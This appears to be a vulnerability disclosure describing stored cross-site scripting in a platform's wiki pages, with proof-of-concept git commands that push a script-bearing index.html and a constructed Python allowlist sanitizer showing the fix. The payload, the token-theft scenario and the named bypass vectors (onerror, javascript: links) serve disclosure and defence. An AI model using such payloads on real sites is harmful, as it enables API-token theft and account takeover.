There is a persistent (stored) cross-site scripting (XSS) vulnerability in the wiki pages: script contained in an HTML file pushed to a wiki repository executes in the browser of anyone who views that page. Because it runs in the site's own origin, it can leak the victim's API token, which leads to account takeover.
As an attacker, create a new public repository and use a client that is allowed to push to it. For this PoC, let's say the repository is located at
email@example.com/dummy/test.git. On the client, execute the following commands:
    git clone firstname.lastname@example.org/dummy/test.git
    cd test
    echo "<script>alert('Hello world!');</script>" > index.html
    git add index.html
    git commit -m "This message is super important"
    git push
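To show why the pushed file is dangerous and what a fix looks like, here is an added Python example; it is not the platform's code and the report does not show how the wiki actually renders files. It assumes the reported behaviour is that the pushed file's content is inlined verbatim into a viewer page on the site's own origin (render_wiki_page with hardened=False), and puts an allowlist sanitizer beside it (hardened=True) that drops script/style content, unknown tags, event-handler attributes and javascript: links. The payload, the sanitizer and the helper names are all constructed for this example.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the file the PoC pushes to the wiki repository.
POC_PAYLOAD = "<script>alert('Hello world!');</script>"

# Allowlist for rendered wiki markup. Everything not listed is dropped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "code", "pre",
                "ul", "ol", "li", "h1", "h2", "h3", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "/", "#")


class WikiSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allowlisted tags and attributes.

    Hypothetical sanitizer written for this example, not the platform's code.
    Text inside <script>/<style> is discarded entirely, all other text is
    re-escaped, and href values must use a safe scheme.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag is dropped; its text is still kept, escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # event handlers (onclick, ...) never get through
            value = value.strip()
            if name == "href" and not value.lower().startswith(SAFE_HREF_PREFIXES):
                continue  # blocks javascript: and data: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment: str) -> str:
    """Return an allowlist-filtered version of a wiki HTML fragment."""
    parser = WikiSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_wiki_page(content: str, hardened: bool) -> str:
    """Wrap pushed wiki content in the viewer page.

    hardened=False models the assumed bug: the pushed file is inlined
    verbatim into a page served from the site's own origin.
    hardened=True runs the content through the allowlist sanitizer first.
    """
    body = sanitize(content) if hardened else content
    return f'<html><body><div class="wiki">{body}</div></body></html>'


def executes_script(page: str) -> bool:
    """Crude marker used to compare the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_wiki_page(POC_PAYLOAD, hardened=False))  # script tag survives
    print(render_wiki_page(POC_PAYLOAD, hardened=True))   # script tag gone
```

The allowlist approach matters more than the specific tag set: a denylist that only strips `<script>` still lets `<img onerror=...>` or `<a href="javascript:...">` through, which is why the sanitizer above drops every attribute it does not explicitly know and rejects href schemes other than http(s) and relative paths.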